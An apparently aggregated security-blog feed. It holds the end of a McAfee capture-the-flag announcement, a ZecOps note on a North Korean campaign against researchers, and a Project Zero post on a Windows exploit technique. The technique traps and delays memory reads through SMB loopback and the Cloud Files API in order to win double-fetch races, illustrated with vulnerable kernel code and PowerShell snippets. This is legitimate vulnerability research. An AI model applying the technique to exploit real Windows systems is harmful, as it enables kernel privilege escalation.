  • RF (Radio Frequency) 
  • Mobile 
  • Hardware
     

The contest is set up to allow teams as groups or individuals. If you get stuck, a basic hint is available for each challenge, but be warned – it will cost ​​​​​​​you points to access the hint and should only be used as a last resort.  

Read before hacking: CTF rules and guidelines 

McAfee employees are not eligible for prizes in the public competition but are welcome to compete. 

When registering, please use a valid email address, for any password resets and to be contacted for prizes. We will not store or save any email addresses or contact you for any non-contest related reasons.

Please wait until the contest ends to release any solutions publicly. 

Cooperation 

No cooperation between teams with independent accounts. Sharing of keys or providing/revealing hints to other teams is cheating, please help us keep this contest a challenge for all! 

Attacking the Platform 

Please refrain from attacking the competition infrastructure. If you experience any difficulties with the infrastructure itself, questions can be directed to the ATR team using the email in the Contact Us section. ATR will not provide any additional hints, feedback, or clues. This email is only for issues that might arise, not related to individual challenges. 

Sabotage 

Absolutely no sabotaging of other competing teams, or in any way hindering their independent progress. 

Brute Forcing 

No brute forcing of challenge flag/ keys against the scoring site is accepted or required to solve the challenges. You may perform brute force attacks if necessary, on your own endpoint to determine a solution if needed. If you’re not sure what constitutes a brute force attack, please feel free to contact us. 

DenialofService 

DoSing the CapturetheFlag (CTF) platform or any of the challenges is forbidden

Additional rules are posted within the contest following login and should be reviewed by all contestants prior to beginning.

Many of these challenges are designed with Linux end-users in mind. However, if you are a Windows user, Windows 10 has a Linux subsystem called ‘WSL’ that can be useful, or a Virtual Machine can be configured with any flavor of Linux desired and should work for most purposes.​​​​​​​

​​​​​​​Happy hacking! 

Looking for a little extra help? 

Find a list of useful tools and techniques for CTF competitions. While it’s not exhaustive or specifically tailored to this contest, it should be a useful starting point to learn and understand tools required for various challenges. 

Contact Us 

While it may be difficult for us to respond to emails, we will do our best – please use this email address to reach us with infrastructure problems, errors with challenges/flag submissions, etc. We are likely unable to respond to general questions on solving challenges. 

[email protected] 

How much do you know about McAfee’s ​​​​​​​industry-leading research team? 

ATR is a team of security researchers that deliver cutting-edge vulnerability and malware research, red teaming, operational intelligence and more! To read more about the team and some of its highlighted research, please follow this link to the ATR website. 

General Release Statement 

By participating in the contest, you agree to be bound to the Official Rules and to release McAfee and its employees, and the hosting organization from any and all liability, claims or actions of any kind whatsoever for injuries, damages or losses to persons and property which may be sustained in connection with the contest. You acknowledge and agree that McAfee et al is not responsible for technical, hardware or software failures, or other errors or problems which may occur in connection with the contest.  By participating you allow us to publish your name.  The collection and use of personal information from participants will be governed by the McAfee Private Notice.  

The post McAfee ATR Launches Education-Inspired Capture the Flag Contest! appeared first on McAfee Blog.

North Korea APT Might Have Used a Mobile 0day Too?

26 January 2021 at 17:37
North Korea APT Might Have Used a Mobile 0day Too?

Following Google TAG announcement that a few profiles on twitter, were part of an APT campaign targeting security Researchers. According to Google TAG, these threat actors are North Koreans and they had multiple goals of establishing credibility by publishing a well thought of blog posts as well as interacting with researchers via Direct Messages and lure them to download and run an infected Visual Studio project.

https://twitter.com/ihackbanme/status/1353870720191787010

Some of the fake profiles were: @z0x55g, @james0x40, @br0vvnn, @BrownSec3Labs

Using a Chrome 0day to infect clients?

In their post, Google TAG, mentioned that the attackers were able to pop a fully patched Windows box running Chrome. 

From Google’s post:

In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.

Attacking Mobile Users?

According to ZecOps Mobile Threat Intelligence, the same threat actor might have used an Android 0day too.

If you entered this blog from your Android or iOS devices – we would like to examine your device using ZecOps Mobile DFIR tool to gather additional evidence.
Please contact us as soon as convenient at [email protected]

 

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

Windows Exploitation Tricks: Trapping Virtual Memory Access

By: Ryan
21 January 2021 at 19:33

Posted by James Forshaw, Project Zero

This blog is a continuation of my series of Windows exploitation tricks. This one describes an exploitation trick I’ve been trying to develop for years, succeeding (mostly, more on that later) on the latest versions of Windows 10. It’s a trick to trap access to virtual memory, get feedback when it occurs and delay access indefinitely. The blog will go into some of the background for why this technique is useful, an overview of the research I did to find the trick as well as an overview of the types of vulnerabilities it can be used with.

Background

When would you need such an exploitation trick? A good example of the types of security vulnerabilities which can benefit can be found in the seminal Bochspwn research by Mateusz Jurczyk and Gynvael Coldwind. The research showed a way of automating the discovery of memory double-fetches in the Windows kernel.

If you’ve not read the paper, a double-fetch is a type of Time-of-Check Time-of-Use (TOCTOU) vulnerability where code reads a value from memory, such as a buffer length, verifies that value is within bounds and then rereads the value from memory before use. By swapping the value in memory between the first and second fetches the verification is bypassed which can lead to security issues such as privilege escalation or information disclosure. The following is a simple example of a double fetch taken from the original paper.

DWORD* lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (*lpInputPtr > sizeof(LocalBuffer)) { ①

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);②

This code copies a buffer from a controlled user mode address into a fixed sized stack buffer. The buffer starts with a DWORD size value which indicates the total size of the buffer. Memory corruption can occur if the size value pointed to by lpInputBuffer changes between the first read of the size value to compare against the buffer size ① and the second read of the size when copying into the buffer ②. For example, if the first time the value is read it’s 100 and the second it’s 400 then the code will pass the size check as 100 is less than 256 but will then copy 400 bytes into that buffer corrupting the stack.

Once a vulnerability such as this example was discovered Mateusz and Gynvael needed to exploit it. How they achieved exploitation is detailed in section 4 of the paper. The exploit techniques that were identified were all probabilistic. Exploitation typically required two threads racing each other, with one reading and one writing. The probabilistic nature of success is due to the probability that in between the first read from a memory location and the second read the writing thread sets a new value which exploits the vulnerability.

To widen the TOCTOU window many of the techniques described abuse the behavior of virtual memory on Windows. A process on Windows can typically access a large virtual memory region up to 8TiB size. This size is likely to be significantly larger than the physical memory in the system, especially considering the limit is per-process, not per-system. Therefore to maintain the illusion of such a large memory address space the kernel uses on-demand memory paging.

When memory is allocated in the process the CPU’s page tables are set up to indicate the presence of the memory region but are marked as invalid. At this point the virtual memory region has been allocated but there is no physical memory backing it. When the process tries to access that memory region the CPU will generate an exception, generally referred to as a page-fault, which is handled by the kernel.

The kernel can look up the memory address which was accessed to cause the page-fault and try and fix the address. How the page-fault is fixed depends on the type of memory access. A simple example is if the memory was allocated but not yet used the kernel will get a physical memory page, initialize it to zeros then adjust the page tables to map that new physical memory page at the faulting address. Once the page-fault has been fixed the faulting thread can be restarted at the instruction which accessed the memory and the memory access should now succeed as if it was always present.

A more complex scenario is if the page is part of a memory mapped file. In this case the kernel will need to request that the page’s data is read back from disk before it can satisfy the page-fault. This can take quite a long time, at least for spinning rust disks, so it might require the faulting thread to be suspended while it waits for the page to be read. Once the page has been read the memory can be fixed up, the original thread can be resumed and the thread restarted at the faulting instruction.

Overview diagram of page fault causing access to the file system. A user application is shown reading memory from a file mapped into memory. When the memory read occurs a page fault is generated in the kernel. As the memory is part of a file mapping this calls into the IO Manager which then requests the file data from the file system. The read data is then returned back through the kernel to satisfy the page fault and the user application can complete the memory read.

The end result is it can take a significant amount of time, relative to a CPU’s native speed that is, to handle a page-fault. However, abusing these virtual memory behaviors only widens the TOCTOU window, it didn’t allow for precise timing to swap values in memory. The result is the exploitation techniques still came with limitations. For example, it was very slow if not impossible in some cases to exploit on a machine with a single CPU core as it relies on having concurrent threads reading and writing.

An ideal exploit primitive would be one where the exploitation window can be made arbitrarily large so that it becomes trivial to win the race. Taking previous experience and knowledge of existing bug classes my ideal primitive would be one which meets a set of criteria:

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

While meeting all these criteria would be ideal, there’s no guarantee we’ll meet all or any of them. If we only meet some then the range of exploitation vulnerabilities might be limited. Let’s start with a quick overview of the existing work which might give us an idea of how to proceed to find a primitive.

Existing Work

Having spoken to Mateusz and made an effort to look for any subsequent work there seems to be little novel work over and above the original Bochspwn paper on the exploitation of these types of TOCTOU issues. At least this is true for exploitation on Windows, however, novel techniques have been developed on other platforms, specifically Linux. Both of these techniques rely on the behavior of virtual memory I previously described.

The first technique in Linux makes use of Userfault File Descriptor (userfaultfd) to get notifications when page-faults occur in a process. With userfaultfd enabled a secondary thread in the process can read a notification and handle the page-fault in user mode. Handling the fault could be mapping memory at the appropriate location or changing page protection. The key is the faulting thread is suspended until the page-fault is handled by another thread. Therefore if a kernel function accessed the memory the request will be trapped until it's completed. This allows for a primitive where the memory access can be delayed indefinitely as well as having a timing signal for the access. Using userfaultfd also allows the fault to be distinguished between read and write faults as the memory page can be write-protected

Using userfaultdd works for in-process access such as from the kernel, but is not really useful if the code accessing the memory is in another process. To solve that problem you can use the FUSE file system as Jann Horn demonstrated in a previous Project Zero blog post. A FUSE file system is implemented entirely in user mode, but any requests for the file go through the Linux kernel’s Virtual File System APIs. As a file is accessed as if it was implemented by an in-kernel file system it’s possible to map that file into memory using mmap. When a page-fault occurs on a FUSE backed memory region a request will be made to the user-mode file system daemon which can delay the read or write request indefinitely.

Remote File Systems

As far as I can tell there’s nothing equivalent to Linux’s userfaultd on Windows. One feature which caught my eye was memory write watches. But those seem to just allow an application to query if memory had been written to since the last time it was checked and doesn’t allow memory writes to be trapped.

If we can’t just trap page-faults to virtual memory what about mapping a file on a user-mode filesystem like FUSE? Unfortunately there is no built-in FUSE driver in Windows 10 (yet?), but that doesn’t mean there’s no mechanism to implement a file system in user-mode. There are some efforts to make a real FUSE on Windows, such as the WinFsp project, but I’d expect the chances of them being installed on a real system to be vanishingly small.

The first thought I had was to try to exploit Multiple UNC Provider (MUP) clients. When you access a file via a UNC path, e.g. \\server\share\file.bin, this will be handled by a MUP driver in the kernel, which will pass it to one of the registered client drivers. As far as the kernel is concerned the opened file is a regular file (with some caveats) which generally means the file can be mapped into memory. However, any requests for the contents of that file will not be handled directly, but instead handled by a server over a network protocol.

Ideally we should be able to implement our own server, handle the read or write requests to a file mapping which will allow us to detect or delay the request so that we can exploit any TOCTOU. The following table contains only Microsoft MUP drivers that I identified. The table contains what versions of Windows 10 the driver is supported on and whether it’s something enabled by default.

Remote File System

Supported Version

Default?

SMB

Everything

Yes (SMBv1 might be disabled)

WebDAV

Everything

Yes (except Server SKUs)

NFS

Everything

No

P9

Windows 10 1903

No (needs WSL)

Remote Desktop Client

Everything

Yes

While MUP was designed for remote file systems there’s no requirement that the file system server is actually remote. SMB, WebDAV and NFS are IP based protocols and can be redirected to localhost. P9 uses a local Unix Socket which can’t be remoted anyway. The terminal services client sends file access requests back to the client system over the RDP protocol. For all these protocols we can implement the server with varying degrees of effort and see if we can detect and delay reads and writes to the file mapping.

I decided to focus only on two, SMB and WebDAV. These were the only two which are enabled by default and are trivially usable. While the Remote Desktop Client is in theory installed by default the RDP server is not normally enabled by default. Also setting up the RDP session is complex and might require valid authentication credentials therefore I decided against it.

Server Message Block

SMB is almost as old as Windows itself, having been introduced in Lan Manager 1.0 back in 1987. The latest SMB version 3.1 protocol only bears a passing resemblance to that original version having shed its NetBIOS roots for a TCP/IP connection. Its lineage does mean it’s the best integrated of any of the network file systems, with the MUP APIs being designed around the needs of SMB.

I decided to do a simple test of the behavior of mapping a file over SMB. This is fairly easy as you can access SMB on the same machine via localhost. I first created a 1GiB file on a local disk, the rationale being if SMB supports caching file data it’s unlikely to read something that large in one go. I then started Wireshark and monitored the loopback interface to capture the SMB traffic as shown below.

Overview diagram of SMB test with wireshark in place to inspect the network traffic from the SMB client to the SMB server. The diagram starts overview with a user application reading memory of a mapped file which causes a page fault. As the file is on an SMB share this calls into the SMB client which sends a request to the SMB server and from there to the file system. In between the SMB client and SMB server components the Wireshark logo indicates where we are monitoring the network traffic.

I then wrote a quick PowerShell script which will map the file into memory and then reads a few bytes from memory at a few different offsets.

Use-NtObject($f = Get-NtFile "\\localhost\c$\root\file.bin" -Win32Path) {

    Use-NtObject($s = New-NtSection -File $f -Protection ReadWrite) {

        Use-NtObject($m = Add-NtSection -Section $s -Protection ReadWrite) {

            $m.ReadBytes(0, 4)

            $m.ReadBytes(256*1024*1024, 4)

            $m.ReadBytes(512*1024*1024, 4)

            $m.ReadBytes(768*1024*1024, 4)

        }

    }

}

This just reads 4 bytes from offset, 0, 256MiB, 512MiB and 768MiB. Going back to Wireshark I filtered the output to only SMBv2 read requests using the display filter smb2.cmd == 8, and the following four packets can be observed.

Read Request Len:32768 Off:0 File: root\file.bin

Read Request Len:32768 Off:268435456 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

Read Request Len:32768 Off:805306368 File: root\file.bin 

This corresponds with the exact memory offsets we accessed in the script although the length is always 32KiB in size, not the 4 we requested. Note, that it’s not the typical Windows memory allocation granularity of 64KiB which you might expect. In my testing I’ve never seen anything other than 32KiB requested.

All the bytes we’ve tested are aligned to the 32KiB block, what if the bytes were not aligned, for example if we accessed 4 bytes from address 512MiB minus 2? Changing the script to add the following allows us to check the behavior:

$m.ReadBytes(512*1024*1024 - 2, 4)

In Wireshark we see the following read requests.

Read Request Len:32768 Off:536838144 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

The accesses are still at 32KiB boundaries, however as the request straddles two blocks the kernel has fetched the preceding 32KiB of data from the file and then the following 32KiB. You might think that all makes sense, however this behavior turned out to be a fluke of testing.

</span><span class=Overview diagram of memory read layout. In the middle is a set of boxes representing the native 4KiB pages being read. All the boxes are contained within a single larger region which is the large page size. Above the boxes are arrows which show that from the base of the 4KiB box a 32KiB read will be made into the file which can satisfy the reads from other 4KiB pages. The final box shows that the last 32KiB of the large page size will always be read as a single page regardless of where in the box the read occurs." style="max-height: 750; max-width: 600;" />

The diagram above shows the structure of how mapped file reads are handled. When an address is read the kernel will request 32KiB from the closest 4KiB page boundary, not the 32KiB boundary. However, there’s then a secondary structure on top based on the supported size of large pages. If the read is anywhere within 32KiB of the end of a large page the read offset is always for the last 32KiB.

For example, on my system the large page size (as queried using the GetLargePageMinimum API) is 2MiB. Therefore if you start at offset 512MiB, between 512 and 514 - 32KiB the kernel will read 32KiB from the offset truncated to the closest 4KiB boundary. Between 514 - 32KiB and 514MiB the read will always request offset 514 - 32KiB so that the 32KiB doesn’t cross the large page boundary.

This allows reads at 4KiB boundaries, however the amount of data read is still 32KiB. This means that once one 4KiB page is accessed the kernel will populate the current page and 7 following pages. Is there any way to only populate a single native page? Based on a comment from Mateusz I tested returning short reads. If the SMB server returns fewer bytes than requested from the read then rather than failing it only populates the pages covered by the read. By returning these short reads we can get trap granularity down to the native page size except for the final 32KiB of a large page. If a read request is shorter than the native page size the rest of the page is zeroed.

What about writing? Let’s change the script again to call WriteBytes rather than ReadBytes, for example:

$m.WriteBytes(256*1024*1024, @(0xAA, 0xBB, 0xCC, 0xDD))

You will see a write request to the file in Wireshark, similar to the following:

Write Request Len:4096 Off:268435456 File: root\file.bin

However, if you dig a bit deeper you’ll notice that the write only happens once the file is closed, not in response to the WriteBytes call. This makes sense, there isn’t any easy way to detect when the write happened to force the page to be flushed back to the file system. Even if there was a way flushing to a network server for every write would have a massive performance impact.

All is not lost however, before the memory is safe to write it must be populated with the contents from the file. Therefore if you look before the write you’ll see a corresponding read request for the 32KiB region which encompasses the write location which is synchronous with the read. You can detect a write through its corresponding read but you can’t distinguish read from a write at the protocol level.

All this testing indicates if we have control over the server we can detect memory access to the mapped file. Can we delay the access as well? I wrote a simple SMB server in .NET 5 using the SMBLibrary by Tal Aloni. I implemented the server with a custom filesystem handler and added some code to the read path which delays for 10 seconds when the file offset is greater than 512MiB.

if (Position >= (512 * 1024 * 1024)) {

    Console.WriteLine("====> Delaying at Position {0:X}", Position);

    Thread.Sleep(10000);

    Console.WriteLine("====> Continuing.");

}

The data returned by the read operation can be arbitrary, you just need to fill in the appropriate byte buffers in the read. To test the access times I wrapped the memory read requests inside a Measure-Command call to time the memory access.

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

To compare the access time a read request is made to a location 4 bytes below the 512MiB boundary and then at the 512MiB boundary. By making two requests we should be able to see if the results differ per-read. The results were as follows:

# Below 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 1

Milliseconds      : 25

...

# Below 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1

...

# Above 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 10

Milliseconds      : 358

...

# Above 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1

...

The first access for below 512MiB takes around a second, this is because the request still needs to be made to the server and the server is written in .NET which can have a slow startup time for running new code. The second request takes significantly less that 1 second, the memory is now cached locally and so there doesn’t need to be any request.

For the accesses above 512MiB the first request takes around 10 seconds, which correlates with the added delay. The second request takes less than a second because the page is now cached locally. This is exactly what we’d expect, and proves that we can at least delay for 10 seconds. In fact you can delay the request at least 60 seconds before the connection is forcibly reset. This is based on the session timeout for the SMB client. You can query the SMB client timeout using the following command in PowerShell:

PS> (Get-SmbClientConfiguration).SessionTimeout

60

A few things to note about the SMB client’s behavior which came out of testing. First the client or the Windows cache manager seem to be able to do some caching of the remote file. If you request a specific access when opening the file, such as GENERIC_READ | GENERIC_WRITE for the desired access then caching is enabled. This means the read requests do not go to the server if they’re previously been cached locally. However if you specify MAXIMUM_ALLOWED for the desired access the caching doesn’t seem to take place. Secondly, sometimes parts of the file will be pre-cached, such as the first and last 32KiB of the file. I’ve not worked out what is the cause, oddly it seems to happen more often with native code than .NET code, so perhaps it’s Windows Defender peeking at memory or perhaps Superfetch. In general as long as you keep your memory accesses somewhere in the middle of a large file you should be safe.

If you’ve run the example code you might notice a problem, running the example server locally fails with the following error:

System.Net.Sockets.SocketException (10013): An attempt was made to access a socket in a way forbidden by its access permissions.

By default Windows 10 has the SMB server enabled. This takes over the TCP ports and makes them exclusive so it’s not possible to bind to them from a normal user. It is possible to disable the local SMB server, but that would require administrator privileges. Still, it was worth verifying whether the SMB server approach will work even if we have to communicate with a remote server.

I did do some investigation into tricks I could use to get the built-in SMB server to work for our purposes. For example I tried to use the fact that you can set an Opportunistic Lock which will trap file reads. I used this trick to exploit a TOCTOU vulnerability in the LUAFV driver. Unfortunately the SMB server detects the file is already in a lock and waits for the OpLock break to occur before allowing access to the file. This made it a non-starter.

For testing you can disable the LanmanServer service and its corresponding drivers. If you wanted to use this on an arbitrary system you'd almost certainly need to connect to a remote server. I’ve released the example server code here, which can be repurposed, although it is only a demonstrator. It allows for read granularity of the native page size, which is assumed to be 4KiB. The server code should work on Linux but as of version 1.4.3 of SMBLibrary on NuGet there’s a bug which causes the server to fail when starting. There is a fix in the github repository but at the time of writing there’s no updated package.

How well does abusing the SMB client meet with our criteria from earlier? I’ve crossed out all the ones we’ve met.

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

Using the SMB client does meet the majority of our criteria. I verified that it doesn’t matter whether kernel or user mode code accesses the memory it will still trap. The biggest problem is it’s hard to use this from a sandboxed application where it would perhaps be most useful. This is because MUP restricts access to remote file systems by default from restricted and low IL processes and AppContainer sandboxes need specific capabilities which are unlikely to be granted to the majority of applications. That’s not to say it’s completely impossible but it’d be hard to do.

While our trick doesn’t really delay the memory read indefinitely, for our purposes the limit of 60 seconds based on the SMB session timeout is going to be enough for most vulnerabilities. Also once the trap has been activated you can’t force the memory manager to request the same page from the server. I tried playing with memory caching flags and direct IO but at least for files over SMB nothing seemed to work. However, you can specify your own base address when mapping a file so you could map different offsets in the file to the same virtual address by unmapping the original and mapping in a new copy. This would allow you to use the same address multiple times.

WebDAV

As SMB can’t be easily used locally, what about WebDAV? By default TCP port 80 is unused on Windows 10 so we can start our own web server to communicate with. Also unlike on Linux there’s no requirement for having administrator privileges to bind to TCP ports under 1024. Even if either of these were not the case the WebDAV client supports a syntax to specify the TCP port of the server. For example if you use the path \\localhost@8080\share then the WebDAV HTTP connection will be made over port 8080.

However, does the WebDAV client expose the right read and write primitives to allow us to trap on memory access? I wrote a simple WebDAV server using the NWebDav library to serve local files. Running the script but specifying the WebDAV server on port 8080 to open the 1GiB file I’m immediately faced with a problem:

Get-NtFile : (0xC0000904) - The file size exceeds the limit allowed and cannot be saved.

Just opening the file fails with the error code STATUS_FILE_TOO_LARGE. The reason for that can be found in one of many Microsoft Knowledge Base articles such as this one. There’s a default limit of 50MB (that’s decimal megabytes) for any file accessed on a WebDAV share because it used to be possible to cause a denial of service by tricking a Windows system into downloading an arbitrarily large file.

The reason this size limiting behavior is in place is why WebDAV isn’t suitable for this attack. If you resize the file to below 50MB you’ll find the WebDAV client pulls the file in its entirety to the local disk before returning from the file open call. That file is then mapped into memory as a local file. The WebDAV server never receives a GET or PUT request for reads/writes to the memory mapping synchronously so there’s no mechanism to detect or trap specific memory requests.

File System Overlay APIs

Abusing the SMB client does work, but it can’t be used locally on a default installation. I decided I need to look for another approach. As I was looking at Windows Filter Drivers (see last blog post) I noticed a few of the drivers provided a mechanism to overlay another file system on top of an existing one. I trawled through MSDN to find the API documentation to see if anything would be suitable. The three I looked at are shown in the table below.

File system

Supported Version

Default?

Projected File System

Windows 10 1809

No

Windows Overlay (WOF)

Everything

Yes

Cloud Files API

Windows 10 1709

Yes (except non-Desktop Server SKUs)

By far the most interesting one is the Projected File System. This was developed by Microsoft to provide a virtual file system for GIT. It allows placeholder files to be “projected” into a directory on disk and the contents of those files are only “rehydrated” to a full file on demand. In theory this sounds ideal, as long as it would populate the file’s contents piecemeal we could add the delays when receiving the PRJ_GET_FILE_DATA_CB callback.

However a basic implementation based on Microsoft’s ProjectedFileSystem sample code would always rehydrate the entire file during file open, similar to WebDAV. Perhaps there’s an option I missed to stream the contents rather than populate it in one go but I couldn’t find it immediately. In any case the Projected File System is not installed by default making it less useful.

WOF doesn’t really allow you to implement your own file system semantics. Instead it allows you to overlay files from either a secondary Windows Image File (WIM) or compressed on the same volume. This really doesn’t give us the control we’re looking for, you might be able to finagle something to work but it seems a lot of effort.

That leaves us with the Cloud Files API. This is used by OneDrive to provide the local online filesystem but is documented and can be used to implement any file system overlay you like. It works very similar to the Projected File System, with placeholders for files and the concept of hydrating the file on demand. The contents of the files do not need to come from any online service such as OneDrive, it can all be sourced locally. Crucially after some basic testing it supports streaming the contents of the file based on what was being read and you could delay the file data requests and the reading thread would block until the read has been satisfied. This can be enabled by specifying the CF_HYDRATION_POLICY_PRIMARY hydration policy with the value CF_HYDRATION_POLICY_PARTIAL when configuring the base sync root. This allows the Cloud File API to only hydrate the file's parts which were accessed.

This seemed perfect, until I tested with the PowerShell file mapping script where it didn’t work, my cloud file provider would always be requested to provide the entire file. Checking the Cloud Filter driver, when a request is received for mapping a placeholder file, the IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION handler always fully rehydrates the file before completing. If the file is not hydrated fully then the call to NtCreateSection never returns which prevents the file being mapped into memory.

I was going to go back to doing my filter research until I realized I might be able to combine the SMB client loopback with the Cloud Filter API. I already knew that the SMB client doesn’t really map a file, even locally, instead it would read it on-demand via the SMB protocol. And I also knew that the Cloud Filter API would allow streaming of parts of the file on-demand as long as the file wasn’t being mapped into memory. The final setup is shown in the following diagram:

Overview of the operation of the exploitation trick. Memory is read by the application from a mapped file, which causes a page fault. That then requests the contents of the file to be pulled over SMB which goes to the local Cloud Filter Driver and back to the original application where the read is handled.

To use the primitive we first setup our own cloud provider by registering the sync root directory using the CfRegisterSyncRoot API configuring it with the partial hydration policy. Then a 1GiB placeholder can be created in the directory using CfCreatePlaceholders. At this point the file does not have any contents on disk. If we now open and map the placeholder file via the SMB loopback client the file will not be rehydrated immediately.

Any memory access into the mapping will cause the SMB client to make a request for a 32KiB block, which will be passed to our user-mode cloud provider, which we can detect and delay as necessary. It goes without saying that the contents of the file can also be arbitrary. Based on testing it doesn’t seem like you can force the read granularity down to the native page size like when implementing a custom SMB server, however you can still make requests at native page size boundaries within the large page size constraint. It might be possible to modify the file size to trick the SMB server into doing short reads but this behavior has not been tested. A sample implementation of the cloud provider is available here.

Usage Examples

We now have an exploitation trick which allows us to trap and delay virtual memory reads and writes. The big question is, does this improve the exploitation of vulnerabilities such as double fetches? The answer depends on the actual vulnerability. A quick note, when I use the word page I’m meaning the unit of memory which will cause a request to the SMB server, e.g. 32KiB not the native page size such as 4KiB.

Let’s take the example given at the start of this blog post. This vulnerability reads the value from the same memory address, lpInputPtr, twice. First for the comparison, then for the size to copy.  The problem for exploitation is one of the limitations of the technique is the memory trap is one shot. Once the trap has fired to read the size for the comparison you can delay it indefinitely. However, once you provide the requested memory page and the faulting thread is resumed it won’t fire on the second read, it’ll just be read from memory as if it was always there.

You might wonder if you could remap the memory page when you detect the first read? Unfortunately this doesn’t work. When the thread is resumed it restarts at the faulting instruction and will perform the read again, therefore what would happen is the following:

Directory graph showing states of the double fetch. ① Read Size from Pointer -> ② Page Fault -> ③ Remap Page -> ④ Resume Thread -> Back to ①

As you can tell from the diagram you end up trapped in an infinite loop, as you remap a fresh page which just triggers another page fault ad infinitum. If you don’t perform step ③ then the operation will complete and there is a time window between resuming the thread, reading the now valid memory for the size comparison and the second read. However, in this example the time window is likely to be the order of a couple of instructions so using our exploitation trick isn’t better than the existing probabilistic approaches. That said one advantage is you do know when the read occurs which allows you to target the brute force window more accurately.

This example is the worst case, what if there was more time between the reads? Another example from a the Bochspwn paper is shown below:

PDWORD BufferSize = // controlled user-mode address

PUCHAR BufferPtr  = // controlled user-mode address

PUCHAR LocalBuffer;

 

LocalBuffer = ExAllocatePool(PagedPool, *BufferSize);①

if (LocalBuffer != NULL) {

  RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize);②

} else {

  // bail out

}

The same double fetch behavior is present, however what’s different is the value is passed to another function, in this case ExAllocatePool which allocates kernel memory. Depending of the current memory configuration or how large the allocation requested there might be a significant time delay between ① and ②. Is there any way we can win the race?

Well not that I know of, at least not deterministically. But we can exploit one behavior to try to synchronize the reading and writing threads a little. Recall that in order to write to an unresolved page the contents of the page must first be read from the server. Therefore, to maintain consistency any thread writes to the unresolved page must generate a page fault and wait on the same lock as another thread which is just reading from the page, as shown in the following diagram:

Diagram showing separate read and write threads accessing the same pointer, one for read and one for write. When the page fault occurs both threads enter the same lock and they are both resumed once the lock is released.

By synchronizing the reading and writing threads you’re giving yourself a reasonable chance of causing a write to happen during the time window for exploitation. This is still a probabilistic approach, it depends on the scheduler. For example, it’s possible that the write thread is woken before the read thread which will cause the pointer to always take the final value. Or the read thread could run to completion before the write thread is ever scheduled to run making the value never change. It’s possible there’s some scheduler magic such as using multiple reader or writer threads or by selecting appropriate priorities which you could exploit to guarantee read and write ordering. I’d be surprised if something is reliable across multiple Windows 10 systems. I’d be very interested in anyone who’s got better ideas on how to improve the reliability of this.

One approach you might be wondering about is unaligned access, say splitting the value across two separate pages. From a microarchitecture perspective it’s likely that the read will be split up into two parts, first touching one page then another. However, remember how the page fault works, it generates an exception which causes a handler to execute in the kernel. At this point any work the instruction has already done will have been retired while the kernel deals with the page fault. When the thread is resumed it will restart the faulting instruction, which will reissue the appropriate micro operations to read from the unaligned address. Unless the compiler generated two loads for the unaligned access (which might happen on some architectures) then there is no way I know of to restart the memory access instruction part of the way through.

This all seems slightly downbeat on the usefulness of the exploitation trick. Thing is, there’s as many different types of vulnerability as there are fish in the sea (if you’re reading this in 2100, I apologize for the acidification of the seas which killed all marine life, choose your own apocalypse-appropriate proverb instead). For example if we modify the original example as follows:

PDWORD lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (lpInputPtr[0] > sizeof(LocalBuffer) || lpInputPtr[1] != 2) {

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);

The check now ensures the buffer is large enough and a second DWORD in the buffer is not set to 2. The second field might represent the buffer type, and type 2 isn’t valid for this request. If you check the compiler output for this code, such as on Godbolt, the difference in native code is 2 or 3 instructions. This would seem to not materially improve the odds of winning the TOCTOU race when using a naïve probabilistic approach. But with our exploitation trick we can now build a deterministic exploit.

Diagram showing access memory for the two reads which can generate a page fault which can allow us to modify the original size value. The central part of the diagram shows a previous page which only contains the Size field and the next page which contains the Type field and the rest of the structure.

The diagram above shows how we can achieve this deterministic exploit. We can place the Size field on a different page to the rest of the input buffer, although the buffer is still contiguous in virtual memory. The first page (N-1) should already be faulted into memory and contain the Size field which is smaller than the LocalBuffer size. We can let the read for the size ① complete normally.

Next the code will read the Type field which is on page N ②. This page isn’t currently in memory and so when it’s accessed a page fault will occur ③. This requires the kernel to read the contents from the file, which we can detect and delay. When the read is detected we have as long as we need to modify the Size field to contain a value larger than the LocalBuffer size ④. Finally we complete the read, which will restart the thread back at the Type field read instruction ⑤. The code can continue and will now read the overly large Size field and cause memory corruption.

